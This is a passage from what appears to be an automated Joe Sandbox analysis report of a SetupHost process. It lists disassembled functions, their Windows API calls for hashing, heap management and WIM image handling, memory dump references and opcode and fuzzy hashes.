                                                                                                                        • BCryptFinishHash.BCRYPT(?,XQ,00000014,00000000,XQ,0052C23E,00000000,?,00000001), ref: 0051C3D0
                                                                                                                        • BCryptDestroyHash.BCRYPT(?,XQ,0052C23E,00000000,?,00000001), ref: 0051C3E3
                                                                                                                        • LocalFree.KERNEL32(?), ref: 0051C3F0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CryptHash$DestroyFinishFreeLocal
                                                                                                                        • String ID: XQ
                                                                                                                        • API String ID: 2199310115-3277335235
                                                                                                                        • Opcode ID: b2f6f1753458e6ca05336ca7cd6627abc133198342335af18a871f7b4b388717
                                                                                                                        • Instruction ID: 41855ccb48cc190498f20c475dc118b158ac0a4ce3ac50af861d4142e5649e86
                                                                                                                        • Opcode Fuzzy Hash: b2f6f1753458e6ca05336ca7cd6627abc133198342335af18a871f7b4b388717
                                                                                                                        • Instruction Fuzzy Hash: 40E0ED35284205DBE7311F15FC08B657FF5BF59716F244859F5909A0B0DBB15C84EE04
                                                                                                                        Function 005041C5 Relevance: 6.3, APIs: 4, Instructions: 252memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap$_wcsicmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3839862788-0
                                                                                                                        • Opcode ID: 79a4b7340c4c99d81bb334aa16df37035a3e9dfb564729fc0e93c44daf387a08
                                                                                                                        • Instruction ID: 260096812a8426043f59399451c923f9b3ab6dfd11767fb42354cb1c63263510
                                                                                                                        • Opcode Fuzzy Hash: 79a4b7340c4c99d81bb334aa16df37035a3e9dfb564729fc0e93c44daf387a08
                                                                                                                        • Instruction Fuzzy Hash: 719138B1A0061A9FCF05DFE9D994AAEBBB5FF48304F504029FA01AB291DB71AD05CF50
                                                                                                                        Function 0051C3FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • BCryptOpenAlgorithmProvider.BCRYPT(?,SHA1,00000000,00000000,?,?,?,?,0051C4E3,?,?,XQ,0052C13B,00000000,?,00000001), ref: 0051C425
                                                                                                                        • BCryptCloseAlgorithmProvider.BCRYPT(?,00000000,?,0051C4E3,?,?,XQ,0052C13B,00000000,?,00000001), ref: 0051C44A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AlgorithmCryptProvider$CloseOpen
                                                                                                                        • String ID: SHA1
                                                                                                                        • API String ID: 58216706-1053416790
                                                                                                                        • Opcode ID: 38cf845984b02914c67f73a2bd0610447b1a8495f8044d8417a825dd756541b2
                                                                                                                        • Instruction ID: d40dbee1bf9f3f47ca5344d18df079d707faa1b032de4c941052d5c8d720ea27
                                                                                                                        • Opcode Fuzzy Hash: 38cf845984b02914c67f73a2bd0610447b1a8495f8044d8417a825dd756541b2
                                                                                                                        • Instruction Fuzzy Hash: EDF0A470601218EBDB11CF65EC249ABBFB8FF59356B4040AAF401D3240CB70A985D694
                                                                                                                        Function 00502459 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: 361c6e407359cd8e475902a4cd8ed53aceaee9df1515d1382727141e2b024d52
                                                                                                                        • Instruction ID: af187b3d7bb154eeec892398298a197c124a7c46361e000ab350f41371bc4661
                                                                                                                        • Opcode Fuzzy Hash: 361c6e407359cd8e475902a4cd8ed53aceaee9df1515d1382727141e2b024d52
                                                                                                                        • Instruction Fuzzy Hash: 65E0B632511A909BC7358F0AE908E47BBE9EBD4B11B05846EA06A83960C6749845CA50
                                                                                                                        Function 005023C9 Relevance: 1.5, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3298025750-0
                                                                                                                        • Opcode ID: 295da18b28b7c9f9a0f145859082267e915d12c65d50a3bebfc35be70698cb31
                                                                                                                        • Instruction ID: d2b73cb38978cccf34ebcf07a4091af431d6029be468389d4dd3486cbb366a2a
                                                                                                                        • Opcode Fuzzy Hash: 295da18b28b7c9f9a0f145859082267e915d12c65d50a3bebfc35be70698cb31
                                                                                                                        • Instruction Fuzzy Hash: 6FD05E32050750DFD3314F05E808B427BF1FB64711F25095DE441469B1D7B89C89DBC4
                                                                                                                        Function 0050D284 Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • HeapAlloc.KERNEL32(?,00000000,?,?,?,?,00508B2D,?), ref: 0050D2AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocHeap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4292702814-0
                                                                                                                        • Opcode ID: 65087ca7c1719f9fb33cce986ca79df36ed36bce223d3f18b222ab63aeadcb0e
                                                                                                                        • Instruction ID: cab9f32cbe11de54ac55d5427620675437a90f6c5dba8209c526e4baab87d275
                                                                                                                        • Opcode Fuzzy Hash: 65087ca7c1719f9fb33cce986ca79df36ed36bce223d3f18b222ab63aeadcb0e
                                                                                                                        • Instruction Fuzzy Hash: 6DF0E236B0060227D7119DF98C847AB7A68BB41370F140238BA22D62D0D590D80281B0
                                                                                                                        Function 00545070 Relevance: .0, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 699adaed1c8c1913ef5e1a6cdc157d2021b85dfc6bc1561a5be886a9ebf13213
                                                                                                                        • Instruction ID: d68b80c884438bfe8d5912bb6b5ff2f870ca796398f06761f2778f47109cba99
                                                                                                                        • Opcode Fuzzy Hash: 699adaed1c8c1913ef5e1a6cdc157d2021b85dfc6bc1561a5be886a9ebf13213
                                                                                                                        • Instruction Fuzzy Hash: 79A0023214CF4CDB52501A867C19932779DD1D6663A5940A1D514029115972A815D5D5
                                                                                                                        Function 00545150 Relevance: .0, Instructions: 5COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40fc4049a4aa8d589dfb5797985288a47fa0faa5e07a9fad35fc7a3b5749f509
                                                                                                                        • Instruction ID: 02cdc943423eba2a79ecd7185af980ecd5f1e2fab46d921f52f95976ad817f08
                                                                                                                        • Opcode Fuzzy Hash: 40fc4049a4aa8d589dfb5797985288a47fa0faa5e07a9fad35fc7a3b5749f509
                                                                                                                        • Instruction Fuzzy Hash: C1A0223200CB0CC302000282B808833338CC0C0223A0000E0C80002A000832A800C0C8
                                                                                                                        Function 0051E2E4 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 296memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetLastError.KERNEL32(00000020,?,00000000), ref: 0051E30B
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0051E369
                                                                                                                          • Part of subcall function 0051DFE4: SetLastError.KERNEL32(00000006,?,00000000,00000000,0051E358,?,?,00000000), ref: 0051E003
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 0051E361
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 0051E431
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,00000000,?,?,00000000), ref: 0051E459
                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,?,00000000), ref: 0051E4B2
                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0051E4BC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E516
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E51D
                                                                                                                        • GetProcessHeap.KERNEL32(?,00000000,?,00000000), ref: 0051E54A
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E551
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E5E2
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E5E9
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E606
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E60D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 0051E620
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000), ref: 0051E627
                                                                                                                        • memset.MSVCRT ref: 0051E64A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 0051E654
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 0051E65B
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0051E666
                                                                                                                          • Part of subcall function 00521EE7: GetProcessHeap.KERNEL32(00000008,00000168,?,00000000,00000000,?,?,00000000), ref: 00521F0B
                                                                                                                          • Part of subcall function 00521EE7: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00521F12
                                                                                                                          • Part of subcall function 00521EE7: memset.MSVCRT ref: 00521F2D
                                                                                                                          • Part of subcall function 00521EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 00521F54
                                                                                                                          • Part of subcall function 00521EE7: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 00521F66
                                                                                                                          • Part of subcall function 00521EE7: UuidCreate.RPCRT4(00000008), ref: 00521F8B
                                                                                                                          • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000104,00000000), ref: 00521FA3
                                                                                                                          • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000011C,00000000), ref: 00521FB4
                                                                                                                          • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(00000134,00000000), ref: 00521FC8
                                                                                                                          • Part of subcall function 00521EE7: InitializeCriticalSectionAndSpinCount.KERNEL32(0000014C,00000000), ref: 00521FDA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$ErrorLast$Process$Free$CountCriticalInitializeSectionSpin$Create$Eventmemset$AllocBuffersFileFlushUuid
                                                                                                                        • String ID: Fail to flush file buffers$Fail to read WIM header$Fail to update WIM header$The existing WIM file became corrupted$WIMCloseWIM
                                                                                                                        • API String ID: 1391722268-2486278283
                                                                                                                        • Opcode ID: 8d4eee748810fb67d400d1ee47a395a3af524a5455c3273658dcd036807213a0
                                                                                                                        • Instruction ID: e452de2bd151538e362a9140859f131cb5bf61a7f9c6c5677650a79de6b21509
                                                                                                                        • Opcode Fuzzy Hash: 8d4eee748810fb67d400d1ee47a395a3af524a5455c3273658dcd036807213a0
                                                                                                                        • Instruction Fuzzy Hash: 8791E23470072267EB1577706C6FBBF6DAA7FE6701F090818BC02972D2DFA88C819695
                                                                                                                        Function 0051F185 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 293memorytimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,00000000), ref: 0051F213
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F26F
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F3DA
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F3E1
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F3EF
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F3F6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F406
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F40D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F41C
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F423
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F433
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F43A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0051F453
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F45A
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F472
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F479
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000000), ref: 0051F488
                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000000,00000000), ref: 0051F48F
                                                                                                                        • SetLastError.KERNEL32(00000057,?,00000000,00000000), ref: 0051F4A7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$ErrorLastTime$FileSystem
                                                                                                                        • String ID: %I64u$0x%08X$WIM\IMAGE[*]\CREATIONTIME\HIGHPART$WIM\IMAGE[*]\CREATIONTIME\LOWPART
                                                                                                                        • API String ID: 1882856403-1289715265
                                                                                                                        • Opcode ID: ec3b39004d81d64389dccce423a4d0bab9c33a76e70780911c2ec012fa5b9232
                                                                                                                        • Instruction ID: 39f3ea17036b687a99460c7359756c6f21ef758ff251fa87e76650d2b09d83bf
                                                                                                                        • Opcode Fuzzy Hash: ec3b39004d81d64389dccce423a4d0bab9c33a76e70780911c2ec012fa5b9232
                                                                                                                        • Instruction Fuzzy Hash: 75A19CB5E0022AABDF109BE4DD49AEEBFB9BF58700F144426F901E3290D77499459BA0
                                                                                                                        Function 0052930A Relevance: 37.1, APIs: 20, Strings: 1, Instructions: 388memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • memset.MSVCRT ref: 00529336
                                                                                                                        • GetLastError.KERNEL32(00000010,?,00000000,00000000,00000000,00000000), ref: 005293E7
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA,?), ref: 005293FF
                                                                                                                        • __aulldiv.LIBCMT ref: 00529493
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 005294F3
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 005294FA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 00529607
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 0052960E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 00529745
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0052A8AA), ref: 0052974C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ErrorFreeLast$Alloc__aulldivmemset
                                                                                                                        • String ID: ParseChunkRegionInternal
                                                                                                                        • API String ID: 71407944-2127954582
                                                                                                                        • Opcode ID: 4f49b9f650ece71e20813752269d043eea214b66d76a8efe01a79fc37cccf9f9
                                                                                                                        • Instruction ID: db35db805f4041378e7ef7fe729adedb267d041f6a2ee86ca10de1e59bae297a
                                                                                                                        • Opcode Fuzzy Hash: 4f49b9f650ece71e20813752269d043eea214b66d76a8efe01a79fc37cccf9f9
                                                                                                                        • Instruction Fuzzy Hash: 64D1AE71B003299BDB14DFA8E895BAEBBB4FF59710F144529E905EB3C1D7749C008B94
                                                                                                                        Function 0052D1C0 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 382memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00521CBE: GetProcessHeap.KERNEL32(?,00100010,00000000,?,00000001,?,?,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D22
                                                                                                                          • Part of subcall function 00521CBE: HeapAlloc.KERNEL32(00000000,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D29
                                                                                                                          • Part of subcall function 00521CBE: GetProcessHeap.KERNEL32(00000001,00100010,00000000,?,00000001,?,?,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D75
                                                                                                                          • Part of subcall function 00521CBE: HeapAlloc.KERNEL32(00000000,?,00523764,00000000,00000000,00000000,?,00000000), ref: 00521D7C
                                                                                                                        • GetLastError.KERNEL32(?,?), ref: 0052D2B7
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D2CA
                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0052D391
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D3A4
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0052D53B
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0052D55C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0052D56F
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0052D5A5
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 0052D5B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?), ref: 0052D5BF
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0052D5D2
                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0052D5E0
                                                                                                                        • GetLastError.KERNEL32(?), ref: 0052D61A
                                                                                                                        • GetLastError.KERNEL32 ref: 0052D632
                                                                                                                          • Part of subcall function 0052CEB0: EnterCriticalSection.KERNEL32(?,00000000,?,00000000,00528B82), ref: 0052CECB
                                                                                                                          • Part of subcall function 0052CEB0: LeaveCriticalSection.KERNEL32(00000000,00000000,?,00000000,00528B82), ref: 0052CEE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919234544.00000000004C1000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2919779136.0000000000553000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        • Associated: 0000000D.00000002.2920062521.0000000000557000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_13_2_4c0000_SetupHost.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Last$Heap$Process$AllocCriticalSectionStatus$CloseEnterFreeHandleLeave
                                                                                                                        • String ID: AddCaptureNodeToImage$GetMetadataPadding
                                                                                                                        • API String ID: 1694025836-3639775197
                                                                                                                        • Opcode ID: 6b2abd00b9f58242228a5278324c726c0eee74ab94f49048868cdba39739442c
                                                                                                                        • Instruction ID: c764d3b4388c050c69fbcd77a93d7f01d4e0c78e927da403c79b6dc01fb24b52
                                                                                                                        • Opcode Fuzzy Hash: 6b2abd00b9f58242228a5278324c726c0eee74ab94f49048868cdba39739442c
                                                                                                                        • Instruction Fuzzy Hash: ECD1AE75604722ABD724DF65E858A2BBFB5BFCA314F008929F855972D0DB30EC04DBA1
                                                                                                                        Function 0054B3EF Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 165windowthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000001,00000400,?,00000100,00000000,00000000,?,?), ref: 0054B4C7
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0054B52E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000D.00000002.2919234544.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                        • Associated: 0000000D.00000002.2919062803.00000000004C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
